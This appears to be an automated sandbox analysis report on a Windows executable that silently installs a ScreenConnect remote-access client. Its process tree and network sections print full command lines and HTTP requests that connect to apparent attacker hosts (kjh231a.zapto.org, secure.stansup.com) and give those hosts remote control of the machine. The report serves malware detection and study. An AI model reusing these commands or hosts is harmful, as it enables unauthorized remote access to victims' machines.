Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Qjq85KfhBC.exe

Overview

General Information

Sample name:Qjq85KfhBC.exe
renamed because original name is a hash value
Original sample name:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d(1).exe
Analysis ID:1542315
MD5:fdb2a84ffcb57c0bfbbf0aadb9bad790
SHA1:f3333b1aff0e5cafd2bbb96457165f231d0dc73e
SHA256:a43cca6cc162e4b68f0844d507f5300216e6ced88af03fabedc1d053d743064d
Tags:exesecure-stansup-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • Qjq85KfhBC.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\Qjq85KfhBC.exe" MD5: FDB2A84FFCB57C0BFBBF0AADB9BAD790)
    • dfsvc.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4228 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 8052 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6780 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5920 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 2924 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 3544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 7740JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4228JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.f70000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49702, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7740, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 8052, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T19:27:26.419007+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049719TCP
                  2024-10-25T19:27:28.274313+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049720TCP
                  2024-10-25T19:27:33.433121+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049725TCP
                  2024-10-25T19:27:35.115074+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049726TCP
                  2024-10-25T19:27:37.540288+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049727TCP
                  2024-10-25T19:27:43.542452+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049728TCP
                  2024-10-25T19:27:45.189390+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049729TCP
                  2024-10-25T19:27:48.935077+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1049730TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: Qjq85KfhBC.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.6% probability
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00911000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00911000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Uses 32bit PE files
                  Source: Qjq85KfhBC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: Qjq85KfhBC.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.10:49725 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: Qjq85KfhBC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Qjq85KfhBC.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751348890.00000000028B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801490320.0000000000A00000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1801752921.0000000002371000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1746175127.000000000011D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD0459000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769348036.000000001C272000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD045E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1754070448.0000000003192000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2221493797.0000021CD02A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2221493797.0000021CD05F2000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1751788668.0000000004F72000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\Qjq85KfhBC.exeCode function: 0_2_00914A4B FindFirstFileExA,0_2_00914A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.10:49732 -> 79.110.49.185:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49725
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49726
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49720
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49727
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49728
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49729
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49719
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.10:49730
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
